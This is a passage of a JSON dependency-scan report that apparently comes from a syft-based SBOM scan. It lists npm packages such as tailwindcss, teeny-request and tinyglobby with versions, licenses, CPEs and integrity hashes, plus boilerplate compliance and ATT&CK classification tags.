"type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:svg-arc-to-cubic-bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc-to-cubic-bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc_to_cubic_bezier:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc_to_cubic_bezier:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc-to-cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc-to-cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc_to_cubic:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc_to_cubic:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc-to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc-to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc_to:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc_to:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/svg-arc-to-cubic-bezier@3.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz", "integrity": "sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0702fc96b298768b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tailwindcss 3.4.19", "title": "tailwindcss 3.4.19", "description": "Package discovered: tailwindcss 3.4.19", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4180007fa4dbcaa3", "name": "tailwindcss", "version": "3.4.19", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tailwindcss@3.4.19", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz", "integrity": "sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==", "dependencies": { "@alloc/quick-lru": "^5.2.0", "arg": "^5.0.2", "chokidar": "^3.6.0", "didyoumean": "^1.2.2", "dlv": "^1.1.3", "fast-glob": "^3.3.2", "glob-parent": "^6.0.2", "is-glob": "^4.0.3", "jiti": "^1.21.7", "lilconfig": "^3.1.3", "micromatch": "^4.0.8", "normalize-path": "^3.0.0", "object-hash": "^3.0.0", "picocolors": "^1.1.1", "postcss": "^8.4.47", "postcss-import": "^15.1.0", "postcss-js": "^4.0.1", "postcss-load-config": "^4.0.2 || ^5.0 || ^6.0", "postcss-nested": "^6.2.0", "postcss-selector-parser": "^6.1.2", "resolve": "^1.22.8", "sucrase": "^3.35.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1167979aa3e3af06", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: teeny-request 9.0.0", "title": "teeny-request 9.0.0", "description": "Package discovered: teeny-request 9.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5100f72eed8a2178", "name": "teeny-request", "version": "9.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/teeny-request@9.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", "dependencies": { "http-proxy-agent": "^5.0.0", "https-proxy-agent": "^5.0.0", "node-fetch": "^2.6.9", "stream-events": "^1.0.5", "uuid": "^9.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b4e9549620686503", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: thenify 3.3.1", "title": "thenify 3.3.1", "description": "Package discovered: thenify 3.3.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9fd87e687c3b74ca", "name": "thenify", "version": "3.3.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/thenify@3.3.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz", "integrity": "sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw==", "dependencies": { "any-promise": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a439c679c65c98cd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: thenify-all 1.6.0", "title": "thenify-all 1.6.0", "description": "Package discovered: thenify-all 1.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "845b1699e3aa7533", "name": "thenify-all", "version": "1.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/thenify-all@1.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz", "integrity": "sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA==", "dependencies": { "thenify": ">= 3.1.0 < 4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e5c0090ac7c6baa4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: thirty-two 1.0.2", "title": "thirty-two 1.0.2", "description": "Package discovered: thirty-two 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f3444a348db654fb", "name": "thirty-two", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/thirty-two@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz", "integrity": "sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ed31df7df590fd3e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tiny-inflate 1.0.3", "title": "tiny-inflate 1.0.3", "description": "Package discovered: tiny-inflate 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8a9f89a30def4776", "name": "tiny-inflate", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tiny-inflate@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz", "integrity": "sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "99c39b0d16665208", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tiny-invariant 1.3.3", "title": "tiny-invariant 1.3.3", "description": "Package discovered: tiny-invariant 1.3.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "509a74e9f8ec9c11", "name": "tiny-invariant", "version": "1.3.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tiny-invariant@1.3.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz", "integrity": "sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e99ae3502724aa2b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: tinyglobby 0.2.16", "title": "tinyglobby 0.2.16", "description": "Package discovered: tinyglobby 0.2.16", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ea1b10e091012c4d", "name": "tinyglobby", "version": "0.2.16", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/tinyglobby@0.2.16", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz", "integrity": "sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==", "dependencies": { "fdir": "^6.5.0", "picomatch": "^4.0.4" } } }, "compliance": { "cisControlsV8_1": [ 